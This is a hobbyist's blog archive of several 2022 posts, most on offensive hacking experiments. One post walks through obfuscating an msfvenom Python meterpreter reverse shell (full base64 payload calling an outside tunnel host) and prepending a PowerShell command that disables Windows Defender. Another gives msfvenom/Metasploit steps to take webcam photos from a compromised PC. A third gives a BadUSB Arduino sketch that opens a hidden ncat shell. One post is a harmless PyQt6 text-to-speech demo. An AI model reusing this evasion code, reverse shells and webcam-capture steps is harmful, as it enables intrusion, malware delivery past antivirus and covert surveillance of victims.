Friday, August 19, 2022

Avoiding Anti Virus Detection By Creating Payloads Msfvenom for Python

This is a secret that I have to share to the public for educational purposes and for anti virus companies to take into consideration. All of my reverse shell experiments requires that I have to disable my firewall and antivirus so that my experiments will yield results because they were just mere to prove that software and methods work and so far I succeeded but I realized that it is still incomplete, I have mentioned in my previous post that a crypter like Shellter may be used to avoid anti virus detection so I tried it but the encrypted payload was detected by Windows Defender because Shellter is no longer being updated by its creators. I have not tried Veil as crypter but though my endless research, it has the same situation as Shellter. I want to do something better by avoiding anti virus detection. The crypter I have tried failed so I decided to use obfuscation method and I am so happy to announce with the latest update of Windows Defender, it was not able to detect the payload I created from MSFVenum(but I tweaked it a little bit), it was my own experiment only.

Windows Defender looks for hashes inside a file that matches their database of known threats, so what if I have access to that hashes and modify it a little bit and will only be restored during runtime. So I researched if the payload in msfvenum can be outputted to a python script and it really can by issuing the following command:

msfvenom -p python/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o payload.py


It created the following python script:

1
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')(aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3YzdmNTU0ODExMGU3LmxocnR1bm5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKGQpKSx7J3MnOnN9KQo=)[0]))

This is a complete python script and can already be executed. The portion where the payload is the long encyrpted word where I suspect the hash is located). So I used PyInstaller to convert it to an executable file by typing the following:

pyinstaller --noconsole --onefile payload.py --nowindowed

Then I uploaded it to google drive, I could not send it via email(yahoo and gmail) because they can detect it as harmful file and these emails do not allow .exe file even if the file has no virus. I also tried facebook messenger and it did not also allowed the file to be sent because it detected that it has malicious content. I tried to change the extention from .exe to .zip file and send it to Facebook messenger, and I was surprised that it succeeded. But this is very impractical because you can not instruct your friend that he has to change it back to .exe file, it will still be detected by Windows Defender after conversion. So I succeeded in uploading the file to my google drive. I tried to download it to my other pc but that was the time when google detected that it was a virus, but still it has an option if I want to download it or not so I obviously continued downloading the file but when it reached 90% , Windows Defender stopped the download because it was a virus.

So basically I could not download the payload. 

As stated in the second paragraph, I need to tweak the python script. I have to take out the encrypted word and assign it to a variable. I made a little change to the encrypted word by inserting several spaces randomly. The second command is to remove the spaces then compile it using pyinstaller then upload it to google drive and download it and I succeeded in downloading the payload without getting detected by Windows Defender or Google.

Here is the complete python script:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
import subprocess
def run(self, cmd):
    completed = subprocess.run(["powershell", "-Command", cmd], capture_output=True)
    return completed

if __name__ == '__main__':
    hello_command = "Set-MpPreference -DisableRealtimeMonitoring $true"
    #hello_info = run(hello_command)
    subprocess.run(["powershell", "-Command", hello_command], capture_output=True)	
codel = ' aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbi ByYW5nZSgxMCk6Cgl0cnk6CgkJ cz1zb2NrZXQuc29ja2V0KDIsc2 9ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2I3Yz dmNTU0ODExMGU3LmxocnR1b m5lbC5saW5rJyw0NDMpKQoJCWJyZWFrCglleGNl cHQ6CgkJdGltZS5zbGVlcCg1KQpsPX N0cnVjdC51bnBhY2soJz5JJyxzLnJlY3 YoNCkpWzBdCmQ9cy5yZWN2K GwpCndoaWxlIGxlbihkKTxsOgoJ ZCs9cy5yZWN2KGwtbGVuKGQpKQ pleGVjKHpsaWIuZGVjb21wcmVzcy hiYXNlNjQuYjY0ZGVjb2RlKGQp KSx7J3MnOnN9KQo='

codel.replace(" ","") 
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')(codel)[0]))    

As an added bonus, I added a feature to disable the Windows Defender realtime protection before executing the payload. I was planning to disable the firewall but as of my writing, I have not implemented it yet because I was too excited to document what I have just achieved.

 My experiment so far is based on my current installed anti virus software which comes pre installed on my pc. I think it is bundled with any lisenced Windows OS. As part of my testing phase, I uploaded the python script to virustotal.com to test if other anti viruses can detect it. AVG and  Avast were able to detect it. I thought that the spaces I have added was not enough so I added some more spaces and uploaded it again to virustotal.com and finally it came out to be virus free.

To be continued...

Thursday, August 11, 2022

Taking a Photo from a Webcam of a Hacked Windows 10 PC

 As I mentioned from my previous post(Setting-up a Lab for Metasploit), I was trying to do an experiment whether I could open the webcam of a hacked Windows PC. This article as the title suggests, I will just take a photo from the hacked machine and save it to a local directory which is not far from the original objective of my experiment but I think it is possible to view the live streaming from the webcam which I may explore in the near future but for now, I will just take a photo.

Here's how I was able to do it:

1. The initial process is basically to setup the needed infrastructure for this experiment which I thoroughly documented on my previous post. I encountered several fuzzy problems during the course, at the time I first did the procedure, everything worked just fine but had to stopped it to attend to other tasks and when I repeated the process a few days after, sometimes the target machine and my vbox Kali wont see each other on the network and after a rediculus trial and error by just keep on restarting, deleting the bridge network adapter and bring it up again, maybe around 10x and finally, they can now see each other.

2. The next thing I did was to create the payload which is a .exe file using msfvenom by typing the following at the Terminal Emulator:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=<IP Address> LPORT=<Port Number> -o name.exe 

This payload will be uploaded to the target Windows 10 Pc. In my case, I had to save it to a microsd card from my host machine then insert it to my target machine. This .exe file is a virus so I had to disable my firewall and antivirus. There are techniques to hide it and avoid virus detection. One method is to use Shellter. I was not able to perform this step because I could not download it. What this .exe file mainly does is to open a reverse shell once the user of the target machine executes it.

3. I have to run metasploit to listen to the port  by typing the following:

msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP Address>
set LPORT <Port Number>
run

 4. Once the reverse shell was connected, I had to type the following to take a photo from the target machine's webcam and save it locally :

webcam_list - returns the attached webcams on the target machine
webcam_snap -i 1 -v false - takes a photo in jpeg format and saves it to a local directory

And that was it, I was supposed to take a screenshot of each step but as I was writing this post, my Kali crushed, too sad. But it does not really matter, this post serves as a documentation of my experiment.

Tuesday, August 9, 2022

USB as an Attack Vector in Cyber Security

Usb thumb drives can be used by hackers to attack their target machines. The common term for such device is rubber ducky or bad usb. There are a few companies sell this kind of device and price range is between 2000 pesos to 6000 pesos. There are several ways to accomplish this and the simplest way is to use an arduino. There are many variants of arduino from small to ultra small like the femtoduino(the smallest arduino I think). To use this device hackers usually insert it on their target machine's usb port when no one else is watching and it only takes less that 10 seconds or sometimes 3 seconds.

The arduino can be programmed to mimmick a keyboard, which means that once inserted into a usb port, it will be recognize by the computer as a keyboard. And as we all know, Windows machines fully trust keyboards so it will allow it to run it without restriction. To prove this, I experimented with an ordinary USB memory stick by following this guide I found on youtube but even if I have turned of my anti virus, Windows doesnot trust it. So I did a little experiment if all of those people in youtube were saying was true and ordered immediately the cheapest arduino in shoppee(Attiny185 cost only 101 pesos plus 60 pesos delivery charge) and upon arriving, I uploaded the following program(they call it sketch in arduino world). As its price suggest, this bad usb that I used for my experiment is not as sophisticated as those being sold as bad usb in the market.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include "DigiKeyboard.h"
#define KEY_DOWN 0x51 // Keyboard Down Arrow
#define KEY_ENTER 0x28 //Return/Enter Key

void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}

void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
 
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(100);
  
  DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible
  DigiKeyboard.delay(500);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu  
  DigiKeyboard.sendKeyStroke(KEY_M); //goto Move
  for(int i =0; i < 100; i++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);
    }
  DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling
  DigiKeyboard.delay(100);
  DigiKeyboard.println("ncat -lp 768 -vv -e cmd.exe");
  DigiKeyboard.delay(90000);
  digitalWrite(1, LOW); 
  DigiKeyboard.delay(5000);
  

 This program will open the command prompt window and drag it downward so that other people will not see it and create a reverse shell at port 768 if it is inserted on a windows machine.

And on my pc, I will just type "ncat <ip> 768".

My experiment was successful.

You may find the original program at github. This is where I got this idea from youtube.The orignal program was meant to steal wifi password and send it to the internet(webhook site). But it would take around 30 seconds to accomplish its task and may not work on other windows pc(it does not work on my Gole Mini Pc)while the program I uploaded would take less than 10 seconds and for sure if netcat is installed on that pc, it will work. If netcat is not installed but python is installed, a python program that creates a reverse shell can be used instead.

This is just for educational purposes only. You could go to jail if you use this to actually steal something or do something illegal. It is one of the tools used by hackers but also by ethical hackers and penetration testers.


Saturday, August 6, 2022

PyQt6: A simple Text-to-Speech app

 This demo program shows how to use pyttx3 library to transform a text into audio.

The Output:



The Code:

 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import pyttsx3

from PyQt6.QtGui import *
from PyQt6.QtCore import *
from PyQt6.QtWidgets import *



class SpeechRunnable(QRunnable):
    def __init__(self):
        QRunnable.__init__(self)
    def run(self):
        self.engine = pyttsx3.init()
        self.engine.setProperty('rate', 150)
        self.engine.setProperty('volume', 1)
        self.engine.say(self.chat_speech)
        self.engine.runAndWait()

    def say(self, text):
        if text != '':
          self.chat_speech = text
          QThreadPool.globalInstance().start(self)

    def stop(self):
        self.engine.stop()


class Window(QWidget):
    def __init__(self):
        super(Window, self).__init__()
        self.runnable = None
 
        self.le = QTextEdit(self)
        self.le.setPlainText(text)
        self.le.setGeometry(5, 40, 890, 450)
        self.btnStart = QPushButton("start", self)
        self.btnStart.setGeometry(5, 5, 100, 30)
        self.btnStop = QPushButton("stop", self)
        self.btnStop.setGeometry(110, 5, 100, 30)
        self.btnStart.clicked.connect(self.onClickedStart)
        self.runnable = SpeechRunnable()
        self.btnStop.clicked.connect(self.runnable.stop)
        self.setGeometry(25, 45, 900, 500)
        self.setWindowTitle('Speak')

    def onClickedStart(self):
        otext=self.le.toPlainText()
        
        self.runnable.say(otext)
        

    def closeEvent(self, event):
        if self.runnable is not None:
            self.runnable.stop()
            QThread.msleep(100) #delay
        super(Window, self).closeEvent(event)

Thursday, August 4, 2022

Setting-up a Lab for Metasploit

Due to lack of equipment and being on a very low budget, setting up a lab for penetration testing can be a challenge and this is what i have just encountered but I used to this kind of stuff but as I progressed, I am learning new things and want to document it each time I solve the challenge(I keep on challenging my self in order to learn new things).

My goal is to set up a lab wherein I can view the webcam of the target machine. My target machine is Windows 10 Pc and I will attack it from my virtualbox Kali Linux. I am still at the first stage wherein I have to set my equipments. So I browse the web for tutorial and on the side I learned that what I am trying to accomplish is not new and in 2014 a hacker used this idea and his victim was Ms Teen USA 2013, but eventually he was caught and was sentenced to life imprisonment. And also may I add that the Netflix Documentary about Snowden had a similar scene. The NSA can open a webcam anywhere in the world, that's what he is trying to tell the world.

This is just a personal challenge and its not new and probably all antiviruses will detect this. So the first thing I did was disabled my antiviruses and firewalls. The next step was a real challenge to me, because my Kali Linux must be on the same network with my target machine. I've had success establishing a reverse shell wherein the target machine was my Kali Linux running on VirtualBox and my attacking machine is my Windows 10 pc which is the opposite. This kept me busy the whole day.

These are the steps I did:

I created a bridged network linking my Wifi network connection and the Ethernet 2 (Virtualbox Host-only Ethernet Adapter). To do this, select the 2 network adaptors and right click then select "bridged network" from the context menu, and that's it.


 

Then on my Kali Linux Network Setting, I changed it to  Host-Only Adapter and selected from the drop down the Virtualbox Host-only Ethernet Adapter


 

On my Kali Linux, I had to reconfigure my eth0 by modifying /etc/network/interfaces with vim by adding the following:

auto eth0
iface eth0 inet static
address 192.168.24.72/24
netmask 255.255.255.0
gateway 192.168.24.24

Next thing I did was I had to stop and start my eth0 interface by issuing the following commands:

sudo ifdown eth0
sudo ifup eth0

To initially test if the configuration is correct, I had to check the current ip address of my Kali Linux by typing "ifconfig" and i was able to confirm that the ip address is 192.168.24.72 indicating that it is on the same network as my target machine.


 

It can only be confirmed if I can establish a reverse shell by typing "ncat -nv 192.168.24.71 9090 -e cmd.exe"; on my Kali Linux, I had to type "nc -lvp 9090" and a reverse shell was created.